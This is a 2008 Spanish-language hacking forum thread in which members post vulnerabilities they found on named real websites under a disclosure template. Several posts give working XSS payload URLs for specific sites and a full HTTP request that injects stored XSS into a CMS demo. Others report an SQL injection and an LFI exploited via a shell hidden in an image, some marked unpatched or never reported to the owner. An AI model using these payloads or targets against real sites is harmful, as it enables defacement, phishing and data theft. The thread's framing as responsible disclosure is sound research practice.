Publica vulnerabilidades descubiertas por tí

[vengador de las sombras]

Abro este hilo para publicar vulnerabilidad es en sitios webs.

Para poder postear en este hilo se deben de cumplir obligatoriamen te las siguientes normas:

1.-Haber avisado de la existencia del bug al webmaster de la web.
2.-Se debe de publicar en un sitio externo previamente la información sobre el bug, cómo explotarlo etc.
3.- Se deben de exponer en el post las siguientes informaciones:
 

• Site Vulnerable
• Tipo de vulnerabilidad
• Descubridor
• Fecha de descubrimiento
• Fecha de reporte al administrador
• Fecha de liberación
• URL externa
• Parcheado
• Informacion Adicional

4.- En caso de que el bug sea un LFI, postear archivo y variable vulnerable, mostrar ejemplo de cómo se explota(ba), usando algún archivo infofensivo (.txt, .gif, .css).

5.- Para los RFIs queda prohibido exponer un ejemplo que demuestre la vulnerabilidad, a menos que ya haya sido arreglado.

6.-En la informacion adicional, si se desea se puede exponer algún PoC o fotografía explicativa, en ningún caso postear un exploit perfectamente codeado.

7.- Si se tiene alguna duda sobre alguna vulnerabilidad (DUDAS CONCRETAS Y SOBRE EL POST, para otras está el resto del foro) se debe de citar el post que ha causado la duda y exponer el problema/duda.

8.- Para XSS, simplemente demostrar con un <script>alert(69)</script>.

Se pueden añadir o modificar estas normas según se evolucione.

Ejemplo de post:

[ + ] Site:
Para ver este enlace Registrate o Inicia Sesion

www.Dreamers.c om

[ + ] Tipo de Vulnerabilidad: Múltiples[ XSS,  &  LFI]
[ + ] Descubridor: Vengador de las Sombras
[ + ] Fecha Descubrimiento:  Abril 12, 2008
[ + ] Fecha Reporte al Administrador:  Abril 15, 2008
[ + ] Fecha de liberación: Abril 23, 2008
[ + ] URL externa:
Para ver este enlace Registrate o Inicia Sesion

http://argeniversohack.66ghz.com/index.php/topic,1597.0.html

[ + ] Parcheado: Sí, al día siguiente del reporte al administrador.
[ + ] Informacion Adicional: El LFI se explotaba introduciendo una shell en una imagen. Tras esto, te creabas un personaje y subías una foto de él. El include () se encontraban en el archivo plantilla.cgi, en la variable de tipo GET "Plantilla". (
Para ver este enlace Registrate o Inicia Sesion[DIRECCION FOTO]). El xss se encontraba en 
Para ver este enlace Registrate o Inicia Sesion

[vengador de las sombras]

[ + ] Site: [FORO].foroactivo.ne t
[ + ] Tipo de Vulnerabilidad: XSS
[ + ] Descubridor: Fl4mm1ng 0ur sk1llZ(Vengador de las Sombras & Mace Windu & Chipbios)
[ + ] Fecha Descubrimiento: 31 de Julio de 2008
[ + ] Fecha Reporte al Administrador: -------
[ + ] Fecha de liberación: 31 de Julio de 2008
[ + ] URL externa:
Para ver este enlace Registrate o Inicia Sesion
[ + ] Parcheado: NO
[ + ] Informacion Adicional: Al XSS es vulnreable todos los foros de foroactivo.com/.net/ y demás. La vulenrabilidad se encuentra en /report_abuse.forum?page=%2F%<script>alert(/Fl4mm1ng 0ur sk1llZ/)</script>&report=1

[>> s E t H <<]

[ + ] CMS: QuipusNews
[ + ] Tipo de Vulnerabilidad: SCD
[ + ] Descubridor: >> s E t H <<
[ + ] Fecha Descubrimiento: no me acuerdo
[ + ] Fecha Reporte al Administrador:  si web esta off y no les pude avisar :S
[ + ] Fecha de liberación: 22 Agosto 2008, 09:56:07
[ + ] URL externa:
Para ver este enlace Registrate o Inicia Sesion
[ + ] Informacion Adicional: un dork puede ser "aactualizado usando QuipusNews"

[vengador de las sombras]

Externa tiene que ser de fuera del foro, pon tu blog mismo ¬¬

Le pongo chincheta al tema.

[noukeys]

[ + ] WEB:
Para ver este enlace Registrate o Inicia Sesion
[ + ] Tipo de Vulnerabilidad: SQL Injection Básica
[ + ] Descubridor: noukeys
[ + ] Fecha Descubrimiento: no me acuerdo!
[ + ] Fecha Reporte al Administrador:  cuando lo descubri!
[ + ] Fecha de liberación: 04 Septiembre 2008
[ + ] Informacion Adicional: Después de avisarles varias veces, pasan de corregir el error. ejemplo de usuario registrado: ofimatica

[>> s E t H <<]

Sitio web:
Para ver este enlace Registrate o Inicia Sesion
Descubridor: >> s E t H <<
URL del aviso: por e-mail
URL externa: foro.elhacker. net/bugs_y_exploits/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html
Fecha de descubrimiento: 2008/7/20
Fecha de notificación: 2008/7/23
Fecha de publicación: 2008/9/15
Arreglado: si
Información adicional: XSS
Respuesta:Thanks for pointing that out!  I'll get it corrected asap.

Código:

http://www.wordreference.com/sinonimos/%3Ch1%3E%3Cs%3Einyectando%20htm%20;)

[JaAViEr]

Sitio web:
Para ver este enlace Registrate o Inicia Sesion
Descubridor: JaAViEr
Fecha de descubrimiento: No lo Recuerdo
Fecha de notificación: No lo Recuerdo
Fecha de publicación: No lo Recuerdo
Arreglado: no
Vulnerabilidad:XSS
Respuesta:Agrega contenido a la web
URL Vulnerable:
Para ver este enlace Registrate o Inicia Sesion

/my.imageshack.us/registration/index.php?email1="><noscript><input type="

[JaAViEr]

Sitio web:
Para ver este enlace Registrate o Inicia Sesion
Descubridor: JaAViEr
Fecha de descubrimiento: No lo Recuerdo
Fecha de notificación: No lo Recuerdo
Fecha de publicación: No lo Recuerdo
Arreglado: no
Vulnerabilidad:XSS
Respuesta:Agrega contenido a la web
URL Vulnerable:http://www.pan.senado.gob.mx/resultados.php?txttexto="><noscript>

[nacherfaller]

[ + ] Site:
Para ver este enlace Registrate o Inicia Sesion

www.ventadelmo ro.com

[ + ] Tipo de Vulnerabilidad: SQL Inyeccion
[ + ] Descubridor: Nacherfaller
[ + ] Fecha Descubrimiento: 23 de junio de 2008
[ + ] Fecha Reporte al Administrador: 24 septiembre de 2008
[ + ] Fecha de liberación: 25 de septiembre de 2008
[ + ] URL externa:
Para ver este enlace Registrate o Inicia Sesion

www.bluehackin g.mi-web.es

[ + ] Parcheado: si
[ + ] Informacion Adicional:El administrador dijo que sufrio varios de estos ataques y no lo soluciono porque no sabia. Pero ahora ya lo arreglo

[>> s E t H <<]

[ + ] Site:
Para ver este enlace Registrate o Inicia Sesion

www.wavenet.co m

[ + ] Tipo de Vulnerabilidad: XSS
[ + ] Descubridor: >> s E t H <<
[ + ] Fecha Descubrimiento: no me acuerdo
[ + ] Fecha Reporte al Administrador: no pude, me da error al querer contactar
[ + ] Fecha de liberación: 28 de septiembre de 2008
[ + ] URL externa:
[ + ] Informacion Adicional:
la url vulnerable era
Para ver este enlace Registrate o Inicia Sesion
no encontre la forma de ejecutar javascript, pero vengador de las sombras se dio cuenta de la posibilidad de usarlo para robar datos (pishing)

[>> s E t H <<]

Nombre: Jojo cms
Web:
Para ver este enlace Registrate o Inicia Sesion
Version: 1.0 rc1
Reporte:
Para ver este enlace Registrate o Inicia Sesion
Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00
Parcheado: no
Tipo de vulnerabilidad: XSS y FPD

Cross site scripting (non-persistent) and Full path disclosure:

Para ver este enlace Registrate o Inicia Sesion

http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E

Cross site scripting (persistent):

Para ver este enlace Registrate o Inicia Sesion

http://demo.jojocms.org/blog/1/welcome-to-jojocms/

HTTP HEADERS (I injected in 'name' variable):

Código:

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E

RESULT:

Código:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>

sorry, my english is not good